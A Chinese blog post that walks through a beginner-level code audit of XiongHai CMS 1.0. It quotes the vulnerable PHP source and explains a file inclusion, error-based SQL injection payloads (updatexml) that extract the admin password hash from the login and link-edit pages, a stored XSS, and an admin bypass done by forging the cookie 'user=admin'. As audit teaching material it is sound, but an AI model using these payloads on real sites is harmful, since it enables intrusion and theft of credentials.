熊海是一款小型的内容管理系统,1.0版本是多年前的版本了,所以漏洞还是比较多的,而且审计起来难度不大,非常适合入门,所以今天我进行这款cms的代码审计。程序安装后使用seay源代码审计系统打开,首先使用自动审计。

熊海CMS_1.0 代码审计-风君雪科技博客

  可以看到,seay源代码审计工具还是审出了非常多的可疑漏洞的,但是这款工具还是有一定的误报率的。我们需要做的就是可疑漏洞的检查。

0x01 /index.php 的文件包含

  我们首先检查第一个可疑漏洞,打开/index.php文件:

1 <?php
2 //单一入口模式
3 error_reporting(0); //关闭错误显示
4 $file=addslashes($_GET['r']); //接收文件名
5 $action=$file==''?'index':$file; //判断为空或者等于index
6 include('files/'.$action.'.php'); //载入相应文件
7 ?>

  在第6行,我们可以发现这里存在一个非常明显的文件包含漏洞,参数r没有经过任何过滤直接被include包含。我们在根目录下创建phpinfo.php文件,内容为<?php phpinfo(); ?>,在url里提交?r=../phpinfo,程序添加.php后缀名后产生了文件包含。

熊海CMS_1.0 代码审计-风君雪科技博客

  /admin/index.php也同理存在文件包含漏洞。

 0x02 /admin/files/login.php SQL注入

  后面的这些漏洞暂时不看,对一个网站来说,后台登陆的安全性需求最高,我们直接来看登陆页面的代码:

 1 <?php 
 2 ob_start();
 3 require '../inc/conn.php';
 4 $login=$_POST['login'];
 5 $user=$_POST['user'];
 6 $password=$_POST['password'];
 7 $checkbox=$_POST['checkbox'];
 8 
 9 if ($login<>""){
10 $query = "SELECT * FROM manage WHERE user='$user'";
11 $result = mysql_query($query) or die('SQL语句有误:'.mysql_error());
12 $users = mysql_fetch_array($result);
13 
14 if (!mysql_num_rows($result)) {  
15 echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
16 exit;
17 }else{
18 $passwords=$users['password'];
19 if(md5($password)<>$passwords){
20 echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
21 exit;    
22     }
23 //写入登录信息并记住30天
24 if ($checkbox==1){
25 setcookie('user',$user,time()+3600*24*30,'/');
26 }else{
27 setcookie('user',$user,0,'/');
28 }
29 echo "<script>this.location='?r=index'</script>";
30 exit;
31 }
32 exit;
33 ob_end_flush();
34 }
35 ?>

  一段赏心悦目的漏洞,如果所有的网站都这样就不会陷入日站日不动,审计没思路的尴尬局面了。简单看了一眼代码后,企图直接万能密码登陆,登陆的时候发现可以用错误的用户名和正确的密码登陆,如果密码不正确还是不能登陆。黑盒测试失败,继续回来看代码吧…

  首先程序用post方式接收我们传递的参数,然后未经任何过滤进行了用户名校验,如果用户名存在继续进行密码校验。问题出在代码的第19行,这里首先将我们传递的password变量进行md5散列,然后拿散列值与数据库里面的密码进行核对,这也就是我们不能采用万能密码绕过的原因。不过问题不大这里的sql注入算是石锤了,我们可以通过报错注入来利用这个漏洞。我们提交用户名为:

1' or updatexml(1,concat((select concat(0x7e,password,0x7e) from manage)),0) #

   成功报错,我们利用返回的md5值查找对应的密码,结果是找不到的,仔细查看原因发现返回的md5值只有27位…所以我们要进行两次报错注入拼接md5值,最终payload:

1' or updatexml(1,concat((select concat(0x7e,password) from manage)),0) #
1' or updatexml(1,concat((select concat(password,0x7e) from manage)),0) #

 0x03 后台的SQL注入

  成功登陆后台之后我们再查看后台的可疑漏洞,根据自动分析的结果,我们看到了一大堆SQL注入漏洞。一个一个点开看,非常多的变量使用了addslashes进行过滤,这里也不存在gbk和utf-8的编码问题,所以也不用考虑宽字节注入,基本确定属于误报。后面第一个真正的漏洞位于/admin/files/editlink.php,源码如下:

 1 <?php
 2 require '../inc/checklogin.php';
 3 require '../inc/conn.php';
 4 $linklistopen='class="open"';
 5 $id=$_GET['id'];
 6 $query = "SELECT * FROM link WHERE id='$id'";
 7 $resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());
 8 $link = mysql_fetch_array($resul);
 9 
10 $save=$_POST['save'];
11 $name=$_POST['name'];
12 $url=$_POST['url'];
13 $mail=$_POST['mail'];
14 $jieshao=$_POST['jieshao'];
15 $xs=$_POST['xs'];
16 if ($xs==""){
17 $xs=1;    
18     }
19 
20 if ($save==1){
21     
22 if ($name==""){
23 echo "<script>alert('抱歉,链接名称不能为空。');history.back()</script>";
24 exit;
25 }
26 if ($url==""){
27 echo "<script>alert('抱歉,链接地址不能为空。');history.back()</script>";
28 exit;
29 }
30 
31 $query = "UPDATE link SET 
32 name='$name',
33 url='$url',
34 mail='$mail',
35 jieshao='$jieshao',
36 xs='$xs',
37 date=now()
38 WHERE id='$id'";
39 @mysql_query($query) or die('修改错误:'.mysql_error());
40 echo "<script>alert('亲爱的,链接已经成功编辑。');location.href='?r=linklist'</script>"; 
41 exit;
42 }
43 ?>

  非常明显还是那个老问题,通过post提交变量,中间没有进行任何过滤直接查询数据库,继续用刚刚的payload吧,漏洞确实存在的,而且后面还有好多处,不挨个写了。

' or updatexml(1,concat((select concat(0x7e,password,0x7e) from manage)),0) or '

 熊海CMS_1.0 代码审计-风君雪科技博客

0x04 留言板XSS

  源码审计系统还报了一处位于/seacmseditor/php/controller.php的XSS漏洞,但是这里在输出到浏览器的时候被htmlspecialchars转义成为了html实体,所以说这又是一个误报。但是这套CMS还有一个影响比较严重的XSS没有被扫描出,CMS的前台留言板没有进行XSS过滤,后台管理界面也没有进行过滤,因此产生了存储型XSS,而且有针对性的攻击管理员,属于比较危险的一类XSS了。这里不贴代码了。

0x05 垂直越权

  自动审计结果还给出了好几个/inc目录下的任意文件读取,挨个打开阅读源码之后并没有发现这个漏洞,倒是checklogin.php存在一个垂直越权漏洞:

1 <?php
2 $user=$_COOKIE['user'];
3 if ($user==""){
4 header("Location: ?r=login");
5 exit;    
6 }
7 ?>

  一个判断管理员的程序,如果COOKIE中user参数为空,那么就跳转到登陆窗。这样的话越权就很轻松了,我们访问一个需要管理员权限的页面,例如http://127.0.0.1/xhcms-1.0/admin/?r=editlink,抓包在COOKIE后面添加user=admin即可实现越权。

  总之这款CMS对新手友好,大家也可以试着玩一下!